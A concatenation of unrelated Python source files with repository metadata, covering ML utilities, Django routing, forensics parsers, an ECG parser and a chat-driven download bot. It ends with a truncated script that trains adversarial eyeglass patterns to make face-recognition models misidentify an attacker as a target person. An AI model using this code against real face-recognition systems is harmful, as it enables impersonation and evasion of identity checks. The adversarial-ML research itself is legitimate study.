# import libraries import wget import os import fasttext fasttext.FastText.eprint = lambda x: None url = [ # 917kB, compressed version of the model "https://dl.fbaipublicfiles.com/fasttext/supervised-models/lid.176.ftz", # 126MB, faster and slightly more accurate "https://dl.fbaipublicfiles.com/fasttext/supervised-models/lid.176.bin", ] model_names = list(map(lambda u: u.split("/")[-1], url)) # check whether a model is downloaded locally def check_model_exist(option, path="models"): os.makedirs(path, exist_ok=True) if model_names[option] not in os.listdir("models"): return False else: return True # to download fasttext model locally def download_model(option=0, path="models"): if not check_model_exist(option): wget.download(url[option], out=path) # to load fasttext model from directory def load_pretrained_model(option=0, path="models"): download_model(option) PRETRAINED_MODEL_PATH = f"{path}/{model_names[option]}" lang_model = fasttext.load_model(PRETRAINED_MODEL_PATH) return lang_model # predict language of input text using fasttext def predict_lang(prompt, option=0): model = load_pretrained_model(option) lang = model.predict(prompt)[0][0].split("__")[2] return lang
1,328
equipmentdb/urls.py
Jongmassey/ubuc-dev
0
2170696
from django.urls import path from django.views.generic import TemplateView import inspect from equipmentdb.model_base import classToURL from equipmentdb.views import ( UbucBaseListView, UbucBaseCreateView, UbucBaseUpdateView, index, ) from . import views def generatePath(view_class): model_url = classToURL(view_class.model.__name__) if UbucBaseListView in view_class.__bases__: return path(model_url, view_class.as_view(), name=f"{model_url}-list") if UbucBaseCreateView in view_class.__bases__: return path( f"{model_url}/add", view_class.as_view(), name=f"{model_url}-add" ) if UbucBaseUpdateView in view_class.__bases__: return path( f"{model_url}/<int:pk>", view_class.as_view(), name=f"{model_url}-update", ) if UbucBaseUpdateView in view_class.__bases__: return path( f"{model_url}/<int:pk>/delete", view_class.as_view(), name=f"{model_url}-delete", ) urlpatterns = [ path("", index, name="index"), path("about/", TemplateView.as_view(template_name="about.html")), ] urlpatterns += [ generatePath(view_class) for n, view_class in inspect.getmembers(views, inspect.isclass) if "model" in view_class.__dict__ and view_class.__bases__[0] in [ UbucBaseListView, UbucBaseCreateView, UbucBaseUpdateView, UbucBaseUpdateView, ] ]
1,476
Scripts/dataset.py
tasnim7ahmed/Multi-Class-Multi-Label-Text-Classification-Using-BERT
0
2169650
import torch import pandas as pd from transformers import BertTokenizer import numpy as np from common import get_parser parser = get_parser() args = parser.parse_args() np.random.seed(args.seed) torch.manual_seed(args.seed) torch.cuda.manual_seed(args.seed) def format_label(label): label = (str(label)) label = label[1:len(label)-2] for char in label: label = label.replace(".","") return list(map(int, label.split(" "))) class Dataset: def __init__(self, text, target): self.text = text self.tokenizer = BertTokenizer.from_pretrained(args.pretrained_tokenizer_name) self.max_length = args.max_length self.target = target def __len__(self): return len(self.text) def __getitem__(self, item): text = str(self.text[item]) text = "".join(text.split()) inputs = self.tokenizer.encode_plus( text = text, padding = "max_length", truncation = True, max_length = self.max_length ) input_ids = inputs["input_ids"] token_type_ids = inputs["token_type_ids"] attention_mask = inputs["attention_mask"] return{ "input_ids":torch.tensor(input_ids,dtype = torch.long), "attention_mask":torch.tensor(attention_mask, dtype = torch.long), "token_type_ids":torch.tensor(token_type_ids, dtype = torch.long), "target":torch.tensor(format_label(self.target[item]), dtype = torch.long) } def generate_dsfile(path): df = pd.read_csv(path).dropna() Label_Columns = df.columns.tolist()[3::2] print(len(Label_Columns)) print(df[Label_Columns].sum().sort_values()) categorized_comment = df[df[Label_Columns].sum(axis=1) > 0] uncategorized_comment = df[df[Label_Columns].sum(axis=1) == 0] print(f'Categorized - {len(categorized_comment)}, Uncategorized - {len(uncategorized_comment)}') comments = [] labels = [] for i in range(0,len(df.comment.values)): current_comment = df.comment.values[i] current_label = df[Label_Columns].values[i] comments.append(current_comment) labels.append(current_label) sample_count = [0,0,0,0,0,0,0,0] for label in labels: for i in range(0,len(label)): if(label[i]==1): sample_count[i]+=1 print(sample_count) ds_data = pd.DataFrame() ds_data["comment"] = comments ds_data["label"] = labels ds_data.to_csv("../Dataset/mod.csv") del ds_data if __name__=="__main__": #generate_dsfile("../Dataset/train.csv") if(args.augmentation=="True"): data_dir = args.aug_train_file else: data_dir = args.train_file df = pd.read_csv(data_dir).dropna() print(df.head()) dataset = Dataset(text=df.comment.values, target=df.label.values) print(dataset[0])
2,902
lib/python/flame/optimizer/fedopt.py
GaoxiangLuo/flame
6
2168968
# Copyright 2022 Cisco Systems, Inc. and its affiliates # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # SPDX-License-Identifier: Apache-2.0 """FedOPT optimizer""" """https://arxiv.org/abs/2003.00295""" from abc import abstractmethod import logging from diskcache import Cache from .fedavg import FedAvg from ..common.util import (MLFramework, get_ml_framework_in_use, valid_frameworks) from collections import OrderedDict logger = logging.getLogger(__name__) class FedOPT(FedAvg): """FedOPT class.""" def __init__(self, beta_1, beta_2, eta, tau): """Initialize FedOPT instance.""" super().__init__() self.current_weights = None self.d_t = None self.m_t = None self.v_t = None self.beta_1 = beta_1 self.beta_2 = beta_2 self.eta = eta self.tau = tau ml_framework_in_use = get_ml_framework_in_use() if ml_framework_in_use == MLFramework.PYTORCH: self.adapt_fn = self._adapt_pytorch elif ml_framework_in_use == MLFramework.TENSORFLOW: self.adapt_fn = self._adapt_tesnorflow else: raise NotImplementedError( "supported ml framework not found; " f"supported frameworks are: {valid_frameworks}") def do(self, cache: Cache, total: int): """Do aggregates models of trainers. Return: aggregated model """ logger.debug("calling fedopt") self.agg_weights = super().do(cache, total) if self.agg_weights is None: return self.current_weights if self.current_weights is None: self.current_weights = self.agg_weights else: self.adapt_fn(self.agg_weights, self.current_weights) return self.current_weights @abstractmethod def _delta_v_pytorch(self): return @abstractmethod def _delta_v_tensorflow(self): return def _adapt_pytorch(self, average, current): import torch logger.debug("calling _adapt_pytorch") self.d_t = {k: average[k] - current[k] for k in average.keys()} if self.m_t is None: self.m_t = {k: torch.zeros_like(self.d_t[k]) for k in self.d_t.keys()} self.m_t = {k: self.beta_1 * self.m_t[k] + (1 - self.beta_1) * self.d_t[k] for k in self.m_t.keys()} if self.v_t is None: self.v_t = {k: torch.zeros_like(self.d_t[k]) for k in self.d_t.keys()} self._delta_v_pytorch() self.current_weights = OrderedDict({k: self.current_weights[k] + self.eta * self.m_t[k] / (torch.sqrt(self.v_t[k]) + self.tau) for k in self.current_weights.keys()}) def _adapt_tesnorflow(self, average, current): logger.debug("calling _adapt_tensorflow") # TODO: Implement Tensorflow Version raise NotImplementedError("Tensorflow implementation not yet implemented")
3,432
src/server/app/main/models/SignUpContestModel.py
vetrivelcsamy/execode
0
2169257
from .. import db import datetime class SignUpContestModel(db.Model): __tablename__ = 'signup_contest' id = db.Column(db.Integer, primary_key=True) created_at = db.Column(db.DateTime(timezone=True), nullable=False, default=datetime.datetime.now()) contest_id = db.Column(db.Integer, db.ForeignKey( 'contests.id'), nullable=False) user_id = db.Column(db.Integer, db.ForeignKey( 'users.id'), nullable=False)
471
tests/test_cli/test_cli_exceptions.py
charles-l/pyinfra
1,532
2170819
from unittest import TestCase from click.testing import CliRunner from pyinfra_cli.exceptions import CliError from pyinfra_cli.main import cli class TestCliExceptions(TestCase): @classmethod def setUpClass(cls): cls.test_cli = CliRunner() cls.old_cli_show = CliError.show @classmethod def tearDownClass(cls): CliError.show = cls.old_cli_show def setUp(self): self.exception = None CliError.show = lambda e: self.capture_cli_error(e) def capture_cli_error(self, e): self.exception = e self.old_cli_show() def assert_cli_exception(self, args, message): self.test_cli.invoke(cli, args) self.assertIsInstance(self.exception, CliError) assert self.exception.message == message def test_bad_deploy_file(self): self.assert_cli_exception( ['my-server.net', 'nop.py'], 'No deploy file: nop.py', ) def test_bad_fact(self): self.assert_cli_exception( ['my-server.net', 'fact', 'thing'], 'No fact: thing', )
1,103
backend/ml/detector.py
ucinlp/covid19-backend
6
2168840
""" Abstract base class for misconception detectors """ from typing import Any, Dict, List, Union import numpy as np from backend.ml.misconception import MisconceptionDataset # TODO: @rloganiv - The detector/misconception interaction would be better handled by using the # observer design pattern to update the misconception encodings whenever the misconception dataset # issues a notification that it has been updated. The issue with the current approach is that it # may cache redundant data. class Detector: """ Abstract base class for a misconception detector. """ def __init__(self): self._cache: Dict[str, Any] = {} def _encode(self, sentences: List[str]): raise NotImplementedError def _predict(self, scores: np.ndarray) -> List[List[int]]: raise NotImplementedError def predict(self, sentence: str, misconceptions: MisconceptionDataset) -> Dict[str, Any]: """ Predicts whether a given piece of text corresponds to a misconception. # Parameters sentences : str or List[str] The text to score. Can either be a string or a list of strings. misconceptions : MisconceptionDataset The misconceptions to score against. # Returns output : Dict[str, Any] A dictionary of the prediction results. Will be serialized to JSON. """ # TODO: @rloganiv - Current implementation works on a single sentence since that is the # expected input from the frontend. For evaluation purposes it probably makes sense to # allow predictions on batches on instances as well...maybe as a seperate method so output # type is consistent. scores = self.score(sentence, misconceptions) predictions = self._predict(scores)[0] # TODO: Relevance prediction readable_predictions = [] for idx in predictions: score = scores[0, idx] misconception = misconceptions[idx] readable_predictions.append({ 'misinformation_score': float(score), 'misinformation': misconception, }) output_dict = { 'input': sentence, 'relevant': True, 'predictions': readable_predictions, } return output_dict def _score(self, sentences, misconceptions) -> np.ndarray: raise NotImplementedError def score(self, sentences: Union[str, List[str]], misconceptions: MisconceptionDataset) -> np.ndarray: """ Scores whether or not a given piece of text corresponds to a misconception. # Parameters sentences : str or List[str] The text to score. Can either be a string or a list of strings. misconceptions : MisconceptionDataset The misconceptions to score against. # Returns scores : np.ndarray An array with shape (num_sentences, num_misconceptions) containing the scores. """ # encode misconceptions and cache to avoid needless recomputation. if misconceptions not in self._cache: self._cache[misconceptions] = self._encode(misconceptions.sentences) encoded_misconceptions = self._cache[misconceptions] if isinstance(sentences, str): sentences = [sentences] encoded_sentences = self._encode(sentences) scores = self._score(encoded_sentences, encoded_misconceptions) return scores def refresh_cache(self) -> None: """ Refresh (clear) the misconception cache. """ self._cache = {}
3,691
codes/run_yelp.py
BGT-M/AugSplicing
1
2170342
from codes.invoke import optimiAlgo if __name__ == '__main__': 'yelp data' inputfile = '../data/yelp/input.tensor' outpath = '../output/yelp/AugSplicing' s = 30 # time stride(day) maxSp = 30 # the maximum splicing number at each epoch delimeter, N = ',', 3 # the delimeter/dimension of input data steps = 30 # the number of time steps k, l = 10, 5 # the number of top blocks we find/ slack constant optimiAlgo(inputfile, outpath, s, k, l, maxSp, N, delimeter, steps=30)
513
logic/src/libs/multiple_async_requests.py
alexgreendev/UserDataBase
0
2166734
import asyncio # import json # import time from aiohttp import ClientSession, client_exceptions from asyncio import Semaphore, ensure_future, gather, run # from merge_lists import merge_lists # noinspection PyUnresolvedReferences class MultipleAsyncRequests: def __new__(cls): cls.urls = [] cls.semaphore = 10 cls.http_ok = [] return cls @classmethod def add_url(cls, url): cls.urls.append(url) return cls @classmethod def add_status_ok(cls, http_ok): cls.http_ok.append(http_ok) return cls @classmethod def set_connection_limit(cls, limit): asyncio.set_event_loop(asyncio.new_event_loop()) cls.semaphore = Semaphore(limit) return cls @classmethod def request(cls) -> list: return run(cls.__scrape()) @classmethod async def __scrape(cls): tasks = list() async with ClientSession() as session: for url in cls.urls: task = ensure_future(cls.__scrape_bounded(url, cls.semaphore, session)) tasks.append(task) result = await gather(*tasks) return result @classmethod async def __scrape_bounded(cls, url, sem, session): async with sem: return await cls.__scrape_one(url, session) @classmethod async def __scrape_one(cls, url, session): try: async with session.get(url) as response: content = await response.read() except client_exceptions.ClientConnectorError: return None if response.status not in cls.http_ok: return None return content # if __name__ == '__main__': # iter = 1000 # while iter: # res = MultipleAsyncRequests(). \ # add_url('http://localhost:7000/remote-servers/one.json'). \ # add_url('http://localhost:7000/remote-servers/two.json'). \ # add_url('http://localhost:7000/remote-servers/three.json'). \ # add_status_ok(200). \ # set_connection_limit(1000). \ # request() # users_arrs = [json.loads(arr.decode()) for arr in res] # users = merge_lists(users_arrs) # print(sorted(users, key=lambda i: i['id'])) # print(len(users)) # iter -= 1
2,333
scripts/artifacts/snapchatMemimg.py
f0r3ns1cat0r/RLEAPP
0
2169669
import os import datetime import csv import calendar from scripts.artifact_report import ArtifactHtmlReport from scripts.ilapfuncs import logfunc, tsv, timeline, is_platform_windows, media_to_html, kmlgen def monthletter(month): monthdict = {'Jan': '01', 'Feb': '02', 'Mar': '03', 'Apr': '04', 'May': '05', 'Jun': '06', 'Jul': '07', 'Aug': '08', 'Sep': '09', 'Oct': '10', 'Nov': '11', 'Dec': '12'} return monthdict[month] def get_snapchatMemimg(files_found, report_folder, seeker, wrap_text): userlist = [] start_terms = ('memories','custom_sticker') for file_found in files_found: file_found = str(file_found) filename = os.path.basename(file_found) one = (os.path.split(file_found)) username = (os.path.basename(one[0]).split('-')[0]) if username not in userlist: userlist.append(username) #print(userlist) for name in userlist: data_list_media = [] for file_found in files_found: file_found = str(file_found) filename = os.path.basename(file_found) if filename.startswith(start_terms): metadata = filename.split('~') if name == metadata[3]: typeoffile = metadata[0] timestamp = metadata[2] timestamp = timestamp.split('-') org_string = timestamp[5] mod_string = org_string[:-3] timestamp = f'{timestamp[0]}-{timestamp[1]}-{timestamp[2]} {timestamp[3]}:{timestamp[4]}:{mod_string}' usernamefile = metadata[3] media = media_to_html(file_found, files_found, report_folder) file_found_dir = os.path.dirname(file_found) data_list_media.append((timestamp,media,filename,usernamefile,typeoffile,)) if data_list_media: report = ArtifactHtmlReport(f'Snapchat - Memories') report.start_artifact_report(report_folder, f'Snapchat - Memories - {name}') report.add_script() data_headers = ('Timestamp','Media','Filename','User','File Type') report.write_artifact_data_table(data_headers, data_list_media, file_found_dir, html_no_escape=['Media']) report.end_artifact_report() tsvname = f'Snapchat - Memories - {name}' tsv(report_folder, data_headers, data_list_media, tsvname) tlactivity = f'Snapchat - Memories- {name}' timeline(report_folder, tlactivity, data_list_media, data_headers) else: logfunc(f'No Snapchat - Memories - {name}')
2,732
user.py
Chris-karanja/Password-Locker
0
2169959
from credentials import Credentials class User: """Class Generates new instances of Users""" Users = [] #list of users username = '' email = '' password = '' def __init__(self, username, email, password): self.username = username self.email = email self.password = password def add_user(self): """save_contact method saves contact objects into contact_list""" User.Users.append(self) @classmethod def find_user(cls,persona,secret): ''' Method that takes in a persona and returns a user that matches that persona. Args: persona: Person to search for Returns : details of person that matches the persona. ''' for saved_user in cls.Users: if saved_user.username == persona and saved_user.password == secret: return saved_user @classmethod def user_exist(cls,persona): ''' Method that checks if a user exists from the user list. Args: persona: username to search if it exists Returns : Boolean: True or false depending if the user exists ''' for person in cls.Users: if person.username == persona: return True return False @classmethod def display_users(cls): ''' method that returns the user list ''' return cls.Users @classmethod def user_exist(cls, persona): ''' Method that checks if a user exists from the user list. Args: persona: username to search if it exists Returns : Boolean: True or false depending if the user exists ''' for person in cls.Users: if person.username == persona: return True return False @classmethod def display_users(cls): ''' method that returns the user list ''' return cls.Users
1,972
bin/pannzer/operators/naive.py
nestorzaburannyi/annotate
1
2170621
import sys from myoperator import BlockOperator # Clone a rowwise operator. Class name and file name (operators/classname.py) must be identical. class naive(BlockOperator) : """Naive predictor as in CAFA: p(goid) is its base frequency in GOA. Input: qpid list""" def __init__(self,glob): self.glob=glob # define nicknames for column indices [self.data,self.prediction_data]=self.glob.use_sheets(["data","prediction"]) [self.qpid_col]=self.data.use_columns(["qpid"]) self.prediction_data.use_columns(["qpid","goid","frequency","ontology","description"]) # use online dictionary. Object handles in glob are hardcoded self.glob.use_online_dictionaries(['GOIDELIC']) # downloads copy in Runner self.pred=None def process(self,block): try: row=block[0] except: return # empty block if not self.pred: self.pred=self.naive() # load base frequencies qpid=row[self.qpid_col] # input protein identifier # multiply predictions for each qpid for x in self.pred: datarow=[qpid] + x self.prediction_data.append_row(datarow) def naive(self): "base frequencies of GO terms, truncated to 2 decimals" pred=[] # tuples (goid,freq) for goid in self.glob.GOcounts.keys(): ontology=self.glob.ontology[goid] rootcount=self.glob.rootcount[ontology] if rootcount<1: continue count=self.glob.GOcounts[goid] freq=float(count)/rootcount if freq >= 0.01: pred.append( [goid, "%.2f" %freq, ontology, self.glob.godesc[goid] ] ) return(pred)
1,733
shelter/migrations/0004_auto_20200718_1403.py
kermox/schronisko-krakow
1
2170433
# Generated by Django 3.0.5 on 2020-07-18 14:03 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('shelter', '0003_auto_20200717_1605'), ] operations = [ migrations.AlterField( model_name='animal', name='additional_information', field=models.TextField(blank=True, default='', verbose_name='dodatkowe informacje'), ), ]
448
msg.py
AshrafAkon/download_link_from_facebook_message
0
2170808
from fbchat import Client from fbchat.models import * import xmlrpc.client as rpc import requests import time import urllib.parse import random from settigs import group_id, email_id, id_password, file_path, log_file, rpc_url, key from settings import who_sent ################# #global_variables new_msg = [] old_msg = [] unique_req = [] allowed_arg = ['link', 'torrent', 'meta'] grp_chat_id = group_id i = 1 ####end with open(file_path, "w") as f: file.read() with open(log_file, "w") as f: file.read() def start_down(file_type, data, author): if file_type == 'link' or file_type == 'meta': gid = server.aria2.addUri(key,[data]) name = server.aria2.tellStatus(key, gid)['files'][0]['path'].split("/")[-1] confirmed_text = f"Your download has started with the file name {name}" client.send(Message(text=confirmed_text), thread_id=author, thread_type=ThreadType.USER) down_started = f"download started from {who_sent(author)} with the file name {name}" with open(log_file, 'a') as log: log.write(down_started) print(down_started) elif file_type == 'torrent': url = urllib.parse.unquote(data).split("php?u=")[1] fil = requests.get(url).content #print(fil) gid = server.aria2.addTorrent(key, rpc.Binary(fil)) name = server.aria2.tellStatus(key, gid)['files'][0]['path'].split("/")[-1] confirmed_text = f"You download has started with the file name {name}" client.send(Message(text=confirmed_text), thread_id=author, thread_type=ThreadType.USER) down_started = f"download started from {who_sent(author)} with the file name {name}" with open(log_file, 'a') as log: log.write(down_started) print(down_started) else: print("not a valid data type") def torrent_file(message): #a message object will be supplied and it will return the url of the file attachment = message.attachments[0] if isinstance(attachment, FileAttachment): #check if its file url = attachment.url #fetching the url file_name = attachment.name return url, file_name """this function bellow(split_uid_msg) receives a message object and then return a list in this format [uid, [file_type, link or torrent_file_url]] """ def split_uid_msg(message): uid = message.uid text_msg = message.text.split(' ') #file_type, text_msg = message.text.split(' ') if len(text_msg) == 2 or message.attachments: if len(text_msg) == 1 and len(message.attachments) == 1: link, name = torrent_file(message) print(name) return [uid, 'torrent' , link, message.author] else: #file_type, text_msg = message.text.split(' ') print(text_msg[0]) return [uid, text_msg[0], text_msg[1], message.author] else: pass def unique_requests(list1): #list1 = new list of data fetched from messages, list2 = old data simple_list = [] final_list = [] list2 = [] with open(file_path, 'r') as f: x = f.read() y = x.split('&&&7_7&&&') y.pop() for z in y: list2.append(z.split('%%%5_5%%%')) if len(list2) > 0: for curr in list2: simple_list.append(curr[0]) for i in list1: if i[0] in simple_list: pass else: final_list.append(i) if len(final_list) > 0: with open(file_path, 'a') as f: for i in final_list: for n in i: f.write(n) f.write('%%%5_5%%%') f.write('&&&7_7&&&') return final_list #logging to user client = Client(email_id, id_password) while True: print(f"\n\n\n\n\n\n\nnew session. session number {i}") last_ten_msg = client.fetchThreadMessages(thread_id=grp_chat_id, limit=10) if len(last_ten_msg) > 0: print("new req") for current_msg in last_ten_msg: #storing the messages in a organized way if current_msg.text == None: pass elif current_msg.attachments: new_msg.append(split_uid_msg(current_msg)) elif split_uid_msg(current_msg) == None: pass else: new_msg.append(split_uid_msg(current_msg)) print("\n\n\n") print(f"new msg = {new_msg}") unique_req = unique_requests(new_msg) print(f"unique req = {unique_req}") if len(unique_req) > 0: for download in unique_req: print(download[1], download[2], download[3]) start_down(download[1], download[2], download[3]) #old_msg = [] #old_msg = unique_req else: print(f"nothing to download on session {i}") #if len(unique_re #old_msg = [] #old_msg = unique_req last_ten_msg = [] new_msg = [] unique_req = [] print(f"{i} session finished") time.sleep(90) else: time.sleep(60) i += 1
5,387
test_output.py
varshashivhare/Mastering-Python
30
2169925
import os import time import glob import pytest @pytest.mark.parametrize('output_filename', glob.iglob('*/*.out')) def test_output(xprocess, output_filename): output_filename = os.path.abspath(output_filename) def prepare(cwd): return '', ['python3', name + '.py'] name, ext = os.path.splitext(output_filename) pid, log_file = xprocess.ensure(output_filename, prepare) while xprocess.getinfo(output_filename).isrunning(): time.sleep(0.01) with open(output_filename) as output_file: assert output_file.read() == log_file.read()
582
etl/parsers/etw/Microsoft_Windows_CertificateServicesClient_CredentialRoaming.py
IMULMUL/etl-parser
104
2170918
# -*- coding: utf-8 -*- """ Microsoft-Windows-CertificateServicesClient-CredentialRoaming GUID : 89a2278b-c662-4aff-a06c-46ad3f220bca """ from construct import Int8sl, Int8ul, Int16ul, Int16sl, Int32sl, Int32ul, Int64sl, Int64ul, Bytes, Double, Float32l, Struct from etl.utils import WString, CString, SystemTime, Guid from etl.dtyp import Sid from etl.parsers.etw.core import Etw, declare, guid @declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1001, version=0) class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1001_0(Etw): pattern = Struct( "ErrorCode" / Int32ul ) @declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1002, version=0) class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1002_0(Etw): pattern = Struct( "ErrorCode" / Int32ul, "ErrorMsg" / WString ) @declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1003, version=0) class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1003_0(Etw): pattern = Struct( "ErrorCode" / Int32ul, "ErrorMsg" / WString ) @declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1004, version=0) class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1004_0(Etw): pattern = Struct( "ErrorCode" / Int32ul, "ErrorMsg" / WString ) @declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1005, version=0) class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1005_0(Etw): pattern = Struct( "ErrorCode" / Int32ul, "ErrorMsg" / WString ) @declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1006, version=0) class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1006_0(Etw): pattern = Struct( "ErrorCode" / Int32ul, "ErrorMsg" / WString ) @declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1007, version=0) class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1007_0(Etw): pattern = Struct( "ErrorCode" / Int32ul, "ErrorMsg" / WString ) @declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1010, version=0) class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1010_0(Etw): pattern = Struct( "ErrorCode" / Int32ul, "ErrorMsg" / WString ) @declare(guid=guid("89a2278b-c662-4aff-a06c-46ad3f220bca"), event_id=1012, version=0) class Microsoft_Windows_CertificateServicesClient_CredentialRoaming_1012_0(Etw): pattern = Struct( "ErrorCode" / Int32ul, "ErrorMsg" / WString )
2,680
graphility/database_gevent.py
Gromobrody/codernitydb3
1
2169915
from graphility.database_safe_shared import SafeDatabase from graphility.env import cdb_environment try: from gevent.lock import RLock except ImportError: raise NotImplementedError cdb_environment["mode"] = "gevent" cdb_environment["rlock_obj"] = RLock class GeventDatabase(SafeDatabase): pass
310
parse_xml_folder.py
tbj128/philips-ecg-parser
1
2168779
""" Parses the PhilipsECG format and writes out the data to a CSV file and saves the 12-lead ECG waveforms as a single large NumPy array Usage: python parse_xml_folder.py -i <input ECG XML folder> -o <output CSV> -n <output 12-lead ECG waveforms> -m <output ECG image folder> Example: python parse_xml_folder.py -i ecgs -o output.csv -n output.npy -m ecg-imgs """ import os import csv import numpy as np from philips import parse from concurrent import futures from tqdm import tqdm import argparse from pathlib import Path import ecg_plot # # Main Code # def call_parse(args): filename, path, output_image_folder = args output_rows, leads = parse(path) if output_image_folder is not None: ecg_plot.plot(np.array(leads), sample_rate=500, title='12-Lead ECG', columns=1) ecg_plot.save_as_png(f"{output_image_folder}/{filename.replace('.xml', '')}") return output_rows, leads, filename def main(args): input_folder = args.input_folder output_file = args.output_file output_numpy = args.output_numpy output_image_folder = args.output_image_folder if output_image_folder is not None: Path(output_image_folder).mkdir(parents=True, exist_ok=True) with open(output_file, 'w') as csvfile: csvwriter = csv.writer(csvfile, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL) csvwriter.writerow(["input_file_name", "date", "time", "dateofbirth", "sex", "mrn", "csn", "meanqrsdur", "meanprint", "heartrate", "rrint", "pdur", "qonset", "tonset", "qtint", "qtcb", "qtcf", "QTcFM", "QTcH", "pfrontaxis", "i40frontaxis", "qrsfrontaxis", "stfrontaxis", "tfrontaxis", "phorizaxis", "i40horizaxis", "t40horizaxis", "qrshorizaxis", "sthorizaxis", "severity", "statements"]) fs = [] with futures.ProcessPoolExecutor(4) as executor: for filename in os.listdir(input_folder): if filename.endswith(".xml"): future = executor.submit(call_parse, [filename, os.path.join(input_folder, filename), output_image_folder]) fs.append(future) overall_processed_leads = [] for future in tqdm(futures.as_completed(fs), total=len(fs)): output_rows, processed_leads, filename = future.result(timeout=60) for output_row in output_rows: csvwriter.writerow([filename] + output_row) if output_numpy is not None: overall_processed_leads.append(processed_leads) if output_numpy is not None: np.save(output_numpy, np.array(overall_processed_leads)) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Parses the PhilipsECG format and writes out the data to a CSV file and saves the 12-lead ECG waveforms as a single large NumPy array') parser.add_argument('-i', '--input-folder', required=True, help='ECG XML folder') parser.add_argument('-o', '--output-file', required=True, help='The path to the output summary file') parser.add_argument('-n', '--output-numpy', required=False, help='The path to the output NumPy file') parser.add_argument('-m', '--output-image-folder', required=False, help='The path to the output PNG folder') args = parser.parse_args() main(args)
3,491
setup.py
valq7711/websaw
1
2169829
import re from setuptools import setup def get_module_var(varname): regex = re.compile(fr"^{varname}\s*\=\s*['\"](.+?)['\"]", re.M) mobj = next(regex.finditer(open("websaw/__init__.py").read())) return mobj.groups()[0] __author__ = get_module_var('__author__') __license__ = get_module_var('__license__') __version__ = get_module_var('__version__') setup( name="websaw", version=__version__, url="https://github.com/valq7711/websaw", license=__license__, author=__author__, author_email="<EMAIL>", maintainer=__author__, maintainer_email="<EMAIL>", description="websaw - a web framework for rapid development with pleasure", platforms="any", keywords='python webapplication', classifiers=[ "Development Status :: 3 - Alpha", "Environment :: Web Environment", "Intended Audience :: Developers", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", "Programming Language :: Python :: 3.7", "Programming Language :: Python :: 3.8", "Programming Language :: Python :: 3.9", "Topic :: Internet :: WWW/HTTP :: HTTP Servers", "Topic :: Software Development :: Libraries :: Python Modules", ], install_requires=[ "ombott", "click", "gunicorn", "gevent", "tornado", "rocket3", "threadsafevariable", "pydal", "pyjwt", "yatl", "requests", "watchgod", "renoir", ], python_requires='>=3.7', packages=['websaw', 'websaw.core', 'websaw.fixtures'], )
1,632
digital_attack.py
yuhaoooo/agns-pytorch
0
2169544
''' Digital attack by using accessarios ''' import sys import torch import argparse from module.discriminator import Discriminator from module.generator import Generator from module.utils.dataset import EyeGlasses, Crop from torchvision import transforms from torch.utils.data import DataLoader from torch import optim import torch.autograd as autograd from torchvision.utils import save_image from util import load_img, wear_eyeglasses, calc_loss from module.target import FaceNet, ArcFace, CosFace def main(args): # =========================== # Hyper parameters settings # # =========================== batch_size = args.batch_size epochs = args.epochs sample_interval = args.interval device = 'cpu' if args.no_cuda else 'cuda:0' lr = args.lr pretrained_epochs = args.pretrained_epochs classnum = 35 target_model = None img_size = None mode = args.mode target = args.target kappa = args.kappa save_path = args.save_path # ====================== # Summary Informations # # ====================== print('# ===========================') print('# Summary Informations') print('# The attacked model [{}]'.format(args.target_model)) print('# The target class [{}]'.format(args.target)) print('# The attack mode [{}]'.format(args.mode)) print('# ===========================') # =========================== # Preparing datasets # # =========================== # loading eyeglasses dataset eyeglasses = args.eyeglasses trans = transforms.Compose([ Crop(25, 53, 176, 64), transforms.ToTensor(), transforms.Normalize([0.5, 0.5, 0.5], [0.5, 0.5, 0.5]) ]) # loading attacker's images and eyeglasses mask attacker_img = load_img(args.attacker, 224).to(device) mask_img = load_img(args.mask, 224).to(device) # =========================== # Loading pretrained models # # =========================== # generator gen = Generator().to(device) pretrained_model = r'model\gen_{}.pt'.format(pretrained_epochs) gen.load_state_dict(torch.load(pretrained_model)) optimizer_g = optim.Adam(gen.parameters(), lr=lr, betas=(0.5, 0.999)) # discriminator disc = Discriminator().to(device) pretrained_model = r'model\disc_{}.pt'.format(pretrained_epochs) disc.load_state_dict(torch.load(pretrained_model)) optimizer_d = optim.Adam(disc.parameters(), lr=lr, betas=(0.5, 0.999)) # target model if args.target_model == 'FaceNet': target_model = FaceNet(device, classnum, r'model\finetuned_facenet.pt') img_size = (160, 160) elif args.target_model == 'CosFace': target_model = CosFace(device, classnum, r'model\finetuned_cosface.pt') img_size = (112, 96) elif args.target_model == 'ArcFace': target_model = ArcFace(device, classnum, r'model\finetuned_arcface.pt') img_size = (112, 112) else: raise Exception( 'The target model [{}] is not defined!'.format(args.target_model)) # Loss function adversarial_loss = torch.nn.BCELoss() dataset = EyeGlasses(eyeglasses, trans) loader = DataLoader(dataset, batch_size=batch_size, shuffle=True) for epoch in range(epochs): for idx, batch in enumerate(loader): batch_size = batch.shape[0] batch = batch.to(device) # adversarial ground truths valid = torch.ones((batch_size, 1), dtype=torch.float32).to(device) * 0.9 fake = torch.zeros((batch_size, 1), dtype=torch.float32).to(device) # ========================== # train 